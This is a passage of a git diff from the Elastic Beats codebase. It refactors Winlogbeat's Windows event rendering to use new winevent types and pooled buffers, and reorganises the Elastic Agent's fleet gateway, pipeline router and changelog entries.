accountType, _ = sid.LookupAccount("") - event.User.Type = sys.SIDType(accountType) + event.User.Type = winevent.SIDType(accountType) case EvtSystemVersion: - event.Version = sys.Version(data.(uint8)) + event.Version = winevent.Version(data.(uint8)) } } @@ -242,12 +243,12 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { // renderUser returns the event/user data values. This does not provide the // parameter names. It computes a fingerprint of the values types to help the // caller match the correct names to the returned values. -func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []interface{}, fingerprint uint64, err error) { +func (r *Renderer) renderUser(handle EvtHandle, event *winevent.Event) (values []interface{}, fingerprint uint64, err error) { bb, propertyCount, err := r.render(r.userContext, handle) if err != nil { return nil, 0, errors.Wrap(err, "failed to get user values") } - defer bb.free() + defer bb.Free() if propertyCount == 0 { return nil, 0, nil @@ -261,10 +262,10 @@ func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []inte values = make([]interface{}, propertyCount) for i := 0; i < propertyCount; i++ { offset := i * int(sizeofEvtVariant) - evtVar := (*EvtVariant)(unsafe.Pointer(&bb.buf[offset])) + evtVar := (*EvtVariant)(unsafe.Pointer(bb.PtrAt(offset))) binary.Write(argumentHash, binary.LittleEndian, uint32(evtVar.Type)) - values[i], err = evtVar.Data(bb.buf) + values[i], err = evtVar.Data(bb.Bytes()) if err != nil { r.log.Warnw("Failed to read event/user data value. Using nil.", "provider", event.Provider.Name, @@ -281,7 +282,7 @@ func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []inte // render uses EvtRender to event data. The caller must free() the returned when // done accessing the bytes. -func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*byteBuffer, int, error) { +func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*sys.PooledByteBuffer, int, error) { var bufferUsed, propertyCount uint32 err := _EvtRender(context, eventHandle, EvtRenderEventValues, 0, nil, &bufferUsed, &propertyCount) @@ -293,12 +294,12 @@ func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*byteBuffer return nil, 0, nil } - bb := newByteBuffer() + bb := sys.NewPooledByteBuffer() bb.Reserve(int(bufferUsed)) - err = _EvtRender(context, eventHandle, EvtRenderEventValues, uint32(len(bb.buf)), &bb.buf[0], &bufferUsed, &propertyCount) + err = _EvtRender(context, eventHandle, EvtRenderEventValues, uint32(bb.Len()), bb.PtrAt(0), &bufferUsed, &propertyCount) if err != nil { - bb.free() + bb.Free() return nil, 0, errors.Wrap(err, "failed in EvtRender") } @@ -306,7 +307,7 @@ func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*byteBuffer } // addEventData adds the event/user data values to the event. -func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, event *sys.Event) { +func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, event *winevent.Event) { if len(values) == 0 { return } @@ -350,7 +351,7 @@ func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, ev strVal = fmt.Sprintf("%v", v) } - event.EventData.Pairs = append(event.EventData.Pairs, sys.KeyValue{ + event.EventData.Pairs = append(event.EventData.Pairs, winevent.KeyValue{ Key: paramName(i), Value: strVal, }) @@ -384,8 +385,8 @@ func (r *Renderer) formatMessage(publisherMeta *publisherMetadataStore, // formatMessageFromTemplate creates the message by executing the stored Go // text/template with the event/user data values. func (r *Renderer) formatMessageFromTemplate(msgTmpl *template.Template, values []interface{}) (string, error) { - bb := newByteBuffer() - defer bb.free() + bb := sys.NewPooledByteBuffer() + defer bb.Free() if err := msgTmpl.Execute(bb, values); err != nil { return "", errors.Wrapf(err, "failed to execute template with data=%#v template=%v", values, msgTmpl.Root.String()) @@ -397,7 +398,7 @@ func (r *Renderer) formatMessageFromTemplate(msgTmpl *template.Template, values // enrichRawValuesWithNames adds the names associated with the raw system // property values. It enriches the event with keywords, opcode, level, and // task. The search order is defined in the EvtFormatMessage documentation. -func enrichRawValuesWithNames(publisherMeta *publisherMetadataStore, event *sys.Event) { +func enrichRawValuesWithNames(publisherMeta *publisherMetadataStore, event *winevent.Event) { // Keywords. Each bit in the value can represent a keyword. rawKeyword := int64(event.KeywordsRaw) isClassic := keywordClassic&rawKeyword > 0 diff --git a/winlogbeat/sys/wineventlog/renderer_test.go b/winlogbeat/sys/wineventlog/renderer_test.go index c030686e9ad..4b75ff71168 100644 --- a/winlogbeat/sys/wineventlog/renderer_test.go +++ b/winlogbeat/sys/wineventlog/renderer_test.go @@ -36,7 +36,7 @@ import ( "github.com/elastic/beats/v7/libbeat/common/atomic" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) func TestRenderer(t *testing.T) { @@ -166,10 +166,10 @@ func TestTemplateFunc(t *testing.T) { } // renderAllEvents reads all events and renders them. -func renderAllEvents(t *testing.T, log EvtHandle, renderer *Renderer, ignoreMissingMetadataError bool) []*sys.Event { +func renderAllEvents(t *testing.T, log EvtHandle, renderer *Renderer, ignoreMissingMetadataError bool) []*winevent.Event { t.Helper() - var events []*sys.Event + var events []*winevent.Event for { h, done := nextHandle(t, log) if done { diff --git a/winlogbeat/sys/wineventlog/syscall_windows.go b/winlogbeat/sys/wineventlog/syscall_windows.go index 8180ae47521..d64c1a804cf 100644 --- a/winlogbeat/sys/wineventlog/syscall_windows.go +++ b/winlogbeat/sys/wineventlog/syscall_windows.go @@ -25,6 +25,8 @@ import ( "github.com/pkg/errors" "golang.org/x/sys/windows" + + "github.com/elastic/beats/v7/winlogbeat/sys" ) // EvtHandle is a handle to the event log. @@ -439,7 +441,7 @@ func (v EvtVariant) Data(buf []byte) (interface{}, error) { case EvtVarTypeString: addr := unsafe.Pointer(&buf[0]) offset := v.ValueAsUintPtr() - uintptr(addr) - s, err := UTF16BytesToString(buf[offset:]) + s, err := sys.UTF16BytesToString(buf[offset:]) return s, err case EvtVarTypeSByte: return int8(v.ValueAsUint8()), nil diff --git a/winlogbeat/sys/wineventlog/wineventlog_windows.go b/winlogbeat/sys/wineventlog/wineventlog_windows.go index 3b282fd41d7..e0f36680320 100644 --- a/winlogbeat/sys/wineventlog/wineventlog_windows.go +++ b/winlogbeat/sys/wineventlog/wineventlog_windows.go @@ -471,7 +471,7 @@ func readString(buffer []byte, reader io.Reader) (string, error) { } return "", err } - str, _, err := sys.UTF16BytesToString(buffer[offset:]) + str, err := sys.UTF16BytesToString(buffer[offset:]) return str, err } diff --git a/winlogbeat/tests/system/winlogbeat.py b/winlogbeat/tests/system/winlogbeat.py index f10f10f9cb0..38891c32768 100644 --- a/winlogbeat/tests/system/winlogbeat.py +++ b/winlogbeat/tests/system/winlogbeat.py @@ -2,6 +2,7 @@ import os import platform import sys +import time import yaml if sys.platform.startswith("win"): @@ -75,8 +76,17 @@ def write_event_log(self, message, eventID=10, sid=None, if level is None: level = win32evtlog.EVENTLOG_INFORMATION_TYPE - win32evtlogutil.ReportEvent(source, eventID, - eventType=level, strings=[message], sid=sid) + # Retry on exception for up to 10 sec. + t = time.monotonic() + while True: + try: + win32evtlogutil.ReportEvent(source, eventID, + eventType=level, strings=[message], sid=sid) + break + except: + if time.monotonic() - t < 10: + continue + raise def get_sid(self): if self.sid is None: diff --git a/x-pack/elastic-agent/.gitignore b/x-pack/elastic-agent/.gitignore index 81ce70aa69b..cd297650b08 100644 --- a/x-pack/elastic-agent/.gitignore +++ b/x-pack/elastic-agent/.gitignore @@ -7,3 +7,6 @@ pkg/agent/operation/tests/scripts/configurable-1.0-darwin-x86/configurable pkg/agent/operation/tests/scripts/servicable-1.0-darwin-x86/configurable pkg/agent/transpiler/tests/exec-1.0-darwin-x86_64/exec pkg/agent/application/fleet.yml + +# VSCode +/.vscode diff --git a/x-pack/elastic-agent/CHANGELOG.asciidoc b/x-pack/elastic-agent/CHANGELOG.asciidoc index 5c6cd892008..2b67153634f 100644 --- a/x-pack/elastic-agent/CHANGELOG.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.asciidoc @@ -42,6 +42,7 @@ - Fix capabilities resolution in inspect command {pull}[24346]24346 - Fix windows installer during enroll {pull}[24343]24343 - Logging to file disabled on enroll {issue}[24173]24173 +- Prevent uninstall failures on empty config {pull}[24838]24838 ==== New features diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 693c8705c63..246ad6b8bc7 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -44,6 +44,9 @@ - Fix docker enrollment issue related to Fleet Server change. {pull}24155[24155] - Improve log on failure of Endpoint Security installation. {pull}24429[24429] - Verify communication to Kibana before updating Fleet client. {pull}24489[24489] +- Fix nil pointer when null is generated as list item. {issue}23734[23734] +- Add support for filestream input. {pull}24820[24820] +- Add check for URL set when cert and cert key. {pull}24904[24904] ==== New features @@ -77,3 +80,6 @@ - Add TLS support for Fleet Server {pull}24142[24142] - Add support for Fleet Server running under Elastic Agent {pull}24220[24220] - Add CA support to Elastic Agent docker image {pull}24486[24486] +- Add k8s secrets provider for Agent {pull}24789[24789] +- Add STATE_PATH, CONFIG_PATH, LOGS_PATH to Elastic Agent docker image {pull}24817[24817] +- Add status subcommand {pull}24856[24856] diff --git a/x-pack/elastic-agent/fleet.yml.lock b/x-pack/elastic-agent/fleet.yml.lock new file mode 100644 index 00000000000..e69de29bb2d diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index 2585b7269f2..0ece510c183 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -326,6 +326,9 @@ func Package() { func requiredPackagesPresent(basePath, beat, version string, requiredPackages []string) bool { for _, pkg := range requiredPackages { + if _, ok := os.LookupEnv(snapshotEnv); ok { + version += "-SNAPSHOT" + } packageName := fmt.Sprintf("%s-%s-%s", beat, version, pkg) path := filepath.Join(basePath, "build", "distributions", packageName) diff --git a/x-pack/elastic-agent/pkg/agent/application/application.go b/x-pack/elastic-agent/pkg/agent/application/application.go index a5431c35285..96dcac99dff 100644 --- a/x-pack/elastic-agent/pkg/agent/application/application.go +++ b/x-pack/elastic-agent/pkg/agent/application/application.go @@ -46,7 +46,7 @@ func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, status return nil, err } - if err := InjectAgentConfig(rawConfig); err != nil { + if err := info.InjectAgentConfig(rawConfig); err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/agent/application/config.go b/x-pack/elastic-agent/pkg/agent/application/config.go index cbb24018d30..eb964d9c019 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config.go +++ b/x-pack/elastic-agent/pkg/agent/application/config.go @@ -5,63 +5,10 @@ package application import ( - "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" ) type localConfig struct { Fleet *configuration.FleetAgentConfig `config:"fleet"` Settings *configuration.SettingsConfig `config:"agent" yaml:"agent"` } - -func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*configuration.FleetAgentConfig, error) { - cfg := configuration.DefaultFleetAgentConfig() - cfg.Enabled = true - cfg.AccessAPIKey = accessAPIKey - cfg.Kibana = kbn - - if err := cfg.Valid(); err != nil { - return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) - } - return cfg, nil -} - -func createFleetServerBootstrapConfig(connStr string, policyID string, host string, port uint16, cert string, key string, esCA string) (*configuration.FleetAgentConfig, error) { - es, err := configuration.ElasticsearchFromConnStr(connStr) - if err != nil { - return nil, err - } - if esCA != "" { - es.TLS = &tlscommon.Config{ - CAs: []string{esCA}, - } - } - cfg := configuration.DefaultFleetAgentConfig() - cfg.Enabled = true - cfg.Server = &configuration.FleetServerConfig{ - Bootstrap: true, - Output: configuration.FleetServerOutputConfig{ - Elasticsearch: es, - }, - Host: host, - Port: port, - } - if policyID != "" { - cfg.Server.Policy = &configuration.FleetServerPolicyConfig{ID: policyID} - } - if cert != "" || key != "" { - cfg.Server.TLS = &tlscommon.Config{ - Certificate: tlscommon.CertificateConfig{ - Certificate: cert, - Key: key, - }, - } - } - - if err := cfg.Valid(); err != nil { - return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) - } - return cfg, nil -} diff --git a/x-pack/elastic-agent/pkg/agent/application/config_test.go b/x-pack/elastic-agent/pkg/agent/application/config_test.go index 1a0287e2502..c79edd0adf7 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/config_test.go @@ -5,12 +5,9 @@ package application import ( - "io/ioutil" "testing" "time" - "gopkg.in/yaml.v2" - "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" @@ -77,9 +74,3 @@ func mustWithConfigMode(standalone bool) *config.Config { }, ) } - -func dumpToYAML(t *testing.T, out string, in interface{}) { - b, err := yaml.Marshal(in) - require.NoError(t, err) - ioutil.WriteFile(out, b, 0600) -} diff --git a/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go b/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go index 5750734c477..961afb3e147 100644 --- a/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/filters/stream_checker_test.go @@ -16,8 +16,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -const semiLongString = "" - func TestStreamCheck(t *testing.T) { type testCase struct { name string @@ -251,7 +249,7 @@ func TestStreamCheck(t *testing.T) { }, } - log, err := logger.New("") + log, err := logger.New("", false) assert.NoError(t, err) for _, tc := range testCases { diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go index ebdb65ff706..6f3dd09335b 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go +++ b/x-pack/elastic-agent/pkg/agent/application/fleet_server_bootstrap.go @@ -13,6 +13,10 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/stream" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" @@ -33,7 +37,7 @@ type FleetServerBootstrap struct { log *logger.Logger Config configuration.FleetAgentConfig agentInfo *info.AgentInfo - router *router + router pipeline.Router source source srv *server.Server } @@ -52,7 +56,7 @@ func newFleetServerBootstrap( } if log == nil { - log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig) + log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig, false) if err != nil { return nil, err } @@ -85,7 +89,7 @@ func newFleetServerBootstrap( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(bootstrapApp.bgContext, agentInfo, cfg.Settings, bootstrapApp.srv, reporter, monitor, statusCtrl)) + router, err := router.New(log, stream.Factory(bootstrapApp.bgContext, agentInfo, cfg.Settings, bootstrapApp.srv, reporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -96,8 +100,8 @@ func newFleetServerBootstrap( log, agentInfo, router, - &configModifiers{ - Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, + &pipeline.ConfigModifiers{ + Filters: []pipeline.FilterFunc{filters.StreamChecker, modifiers.InjectFleet(rawConfig, sysInfo.Info(), agentInfo)}, }, ) if err != nil { @@ -138,7 +142,7 @@ func (b *FleetServerBootstrap) AgentInfo() *info.AgentInfo { return b.agentInfo } -func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers) (emitterFunc, error) { +func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpiler.AgentInfo, router pipeline.Router, modifiers *pipeline.ConfigModifiers) (pipeline.EmitterFunc, error) { ch := make(chan *config.Config) go func() { @@ -163,8 +167,8 @@ func bootstrapEmitter(ctx context.Context, log *logger.Logger, agentInfo transpi }, nil } -func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDispatcher, modifiers *configModifiers, c *config.Config) error { - if err := InjectAgentConfig(c); err != nil { +func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router pipeline.Router, modifiers *pipeline.ConfigModifiers, c *config.Config) error { + if err := info.InjectAgentConfig(c); err != nil { return err } @@ -202,8 +206,8 @@ func emit(log *logger.Logger, agentInfo transpiler.AgentInfo, router programsDis return errors.New("bootstrap configuration is incorrect causing fleet-server to not be started") } - return router.Dispatch(ast.HashStr(), map[routingKey][]program.Program{ - defautlRK: { + return router.Route(ast.HashStr(), map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: { { Spec: spec, Config: ast, diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway.go similarity index 86% rename from x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway.go index e0313a2c7f5..10c04ed6069 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "context" @@ -11,8 +11,12 @@ import ( "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "github.com/elastic/beats/v7/libbeat/common/backoff" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -44,12 +48,6 @@ type backoffSettings struct { Max time.Duration `config:"max"` } -type fleetAcker = store.FleetAcker - -type dispatcher interface { - Dispatch(acker fleetAcker, actions ...action) error -} - type agentInfo interface { AgentID() string } @@ -58,18 +56,6 @@ type fleetReporter interface { Events() ([]fleetapi.SerializableEvent, func()) } -// FleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the -// bidirectional communication requirements. The gateway aggregates events and will periodically -// call the API to send the events and will receive actions to be executed locally. -// The only supported action for now is a "ActionPolicyChange". -type FleetGateway interface { - // Start starts the gateway. - Start() error - - // Set the client for the gateway. - SetClient(clienter) -} - type stateStore interface { Add(fleetapi.Action) AckToken() string @@ -81,8 +67,8 @@ type stateStore interface { type fleetGateway struct { bgContext context.Context log *logger.Logger - dispatcher dispatcher - client clienter + dispatcher pipeline.Dispatcher + client client.Sender scheduler scheduler.Scheduler backoff backoff.Backoff settings *fleetGatewaySettings @@ -90,24 +76,25 @@ type fleetGateway struct { reporter fleetReporter done chan struct{} wg sync.WaitGroup - acker fleetAcker + acker store.FleetAcker unauthCounter int statusController status.Controller statusReporter status.Reporter stateStore stateStore } -func newFleetGateway( +// New creates a new fleet gateway +func New( ctx context.Context, log *logger.Logger, agentInfo agentInfo, - client clienter, - d dispatcher, + client client.Sender, + d pipeline.Dispatcher, r fleetReporter, - acker fleetAcker, + acker store.FleetAcker, statusController status.Controller, stateStore stateStore, -) (FleetGateway, error) { +) (gateway.FleetGateway, error) { scheduler := scheduler.NewPeriodicJitter(defaultGatewaySettings.Duration, defaultGatewaySettings.Jitter) return newFleetGatewayWithScheduler( @@ -130,14 +117,14 @@ func newFleetGatewayWithScheduler( log *logger.Logger, settings *fleetGatewaySettings, agentInfo agentInfo, - client clienter, - d dispatcher, + client client.Sender, + d pipeline.Dispatcher, scheduler scheduler.Scheduler, r fleetReporter, - acker fleetAcker, + acker store.FleetAcker, statusController status.Controller, stateStore stateStore, -) (FleetGateway, error) { +) (gateway.FleetGateway, error) { // Backoff implementation doesn't support the using context as the shutdown mechanism. // So we keep a done channel that will be closed when the current context is shutdown. @@ -181,7 +168,7 @@ func (f *fleetGateway) worker() { continue } - actions := make([]action, len(resp.Actions)) + actions := make([]fleetapi.Action, len(resp.Actions)) for idx, a := range resp.Actions { actions[idx] = a } @@ -233,7 +220,7 @@ func (f *fleetGateway) execute(ctx context.Context) (*fleetapi.CheckinResponse, // get events ee, ack := f.reporter.Events() - ecsMeta, err := metadata() + ecsMeta, err := info.Metadata() if err != nil { f.log.Error(errors.New("failed to load metadata", err)) } @@ -241,7 +228,7 @@ func (f *fleetGateway) execute(ctx context.Context) (*fleetapi.CheckinResponse, // retrieve ack token from the store ackToken := f.stateStore.AckToken() if ackToken != "" { - f.log.Debug("using previously saved ack token: %v", ackToken) + f.log.Debugf("using previously saved ack token: %v", ackToken) } // checkin @@ -291,7 +278,7 @@ func (f *fleetGateway) shouldUnroll() bool { } func isUnauth(err error) bool { - return errors.Is(err, fleetapi.ErrInvalidAPIKey) + return errors.Is(err, client.ErrInvalidAPIKey) } func (f *fleetGateway) Start() error { @@ -313,6 +300,6 @@ func (f *fleetGateway) stop() { f.wg.Wait() } -func (f *fleetGateway) SetClient(client clienter) { - f.client = client +func (f *fleetGateway) SetClient(c client.Sender) { + f.client = c } diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway_test.go similarity index 90% rename from x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway_test.go index 03381163069..28ffa9dd76e 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/fleet_gateway_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "bytes" @@ -20,10 +20,13 @@ import ( "github.com/pkg/errors" "github.com/stretchr/testify/require" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" repo "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" fleetreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet" fleetreporterConfig "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet/config" @@ -67,7 +70,7 @@ func newTestingClient() *testingClient { return &testingClient{received: make(chan struct{}, 1)} } -type testingDispatcherFunc func(...action) error +type testingDispatcherFunc func(...fleetapi.Action) error type testingDispatcher struct { sync.Mutex @@ -75,7 +78,7 @@ type testingDispatcher struct { received chan struct{} } -func (t *testingDispatcher) Dispatch(acker fleetAcker, actions ...action) error { +func (t *testingDispatcher) Dispatch(acker store.FleetAcker, actions ...fleetapi.Action) error { t.Lock() defer t.Unlock() defer func() { t.received <- struct{}{} }() @@ -107,7 +110,7 @@ func newTestingDispatcher() *testingDispatcher { return &testingDispatcher{received: make(chan struct{}, 1)} } -type withGatewayFunc func(*testing.T, FleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) +type withGatewayFunc func(*testing.T, gateway.FleetGateway, *testingClient, *testingDispatcher, *scheduler.Stepper, repo.Backend) func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGatewayFunc) func(t *testing.T) { return func(t *testing.T) { @@ -115,7 +118,7 @@ func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGat client := newTestingClient() dispatcher := newTestingDispatcher() - log, _ := logger.New("fleet_gateway") + log, _ := logger.New("fleet_gateway", false) rep := getReporter(agentInfo, log, t) ctx, cancel := context.WithCancel(context.Background()) @@ -133,7 +136,7 @@ func withGateway(agentInfo agentInfo, settings *fleetGatewaySettings, fn withGat dispatcher, scheduler, rep, - newNoopAcker(), + noopacker.NewAcker(), &noopController{}, stateStore, ) @@ -161,7 +164,7 @@ func wrapStrToResp(code int, body string) *http.Response { ProtoMinor: 1, Body: ioutil.NopCloser(bytes.NewBufferString(body)), ContentLength: int64(len(body)), - Header: make(http.Header, 0), + Header: make(http.Header), } } @@ -174,7 +177,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send no event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -185,7 +188,7 @@ func TestFleetGateway(t *testing.T) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -199,7 +202,7 @@ func TestFleetGateway(t *testing.T) { t.Run("Successfully connects and receives a series of actions", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -229,7 +232,7 @@ func TestFleetGateway(t *testing.T) { `) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 2, len(actions)) return nil }), @@ -249,7 +252,7 @@ func TestFleetGateway(t *testing.T) { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log, _ := logger.New("tst") + log, _ := logger.New("tst", false) stateStore, err := store.NewStateStore(log, storage.NewDiskStore(paths.AgentStateStoreFile())) require.NoError(t, err) @@ -262,7 +265,7 @@ func TestFleetGateway(t *testing.T) { dispatcher, scheduler, getReporter(agentInfo, log, t), - newNoopAcker(), + noopacker.NewAcker(), &noopController{}, stateStore, ) @@ -274,7 +277,7 @@ func TestFleetGateway(t *testing.T) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -294,7 +297,7 @@ func TestFleetGateway(t *testing.T) { t.Run("send event and receive no action", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -318,7 +321,7 @@ func TestFleetGateway(t *testing.T) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil }), - dispatcher.Answer(func(actions ...action) error { + dispatcher.Answer(func(actions ...fleetapi.Action) error { require.Equal(t, 0, len(actions)) return nil }), @@ -339,7 +342,7 @@ func TestFleetGateway(t *testing.T) { dispatcher := newTestingDispatcher() ctx, cancel := context.WithCancel(context.Background()) - log, _ := logger.New("tst") + log, _ := logger.New("tst", false) stateStore, err := store.NewStateStore(log, storage.NewDiskStore(paths.AgentStateStoreFile())) require.NoError(t, err) @@ -356,14 +359,14 @@ func TestFleetGateway(t *testing.T) { dispatcher, scheduler, getReporter(agentInfo, log, t), - newNoopAcker(), + noopacker.NewAcker(), &noopController{}, stateStore, ) require.NoError(t, err) - ch1 := dispatcher.Answer(func(actions ...action) error { return nil }) + ch1 := dispatcher.Answer(func(actions ...fleetapi.Action) error { return nil }) ch2 := client.Answer(func(headers http.Header, body io.Reader) (*http.Response, error) { resp := wrapStrToResp(http.StatusOK, `{ "actions": [] }`) return resp, nil @@ -406,7 +409,7 @@ func TestRetriesOnFailures(t *testing.T) { t.Run("When the gateway fails to communicate with the checkin API we will retry", withGateway(agentInfo, settings, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, @@ -447,7 +450,7 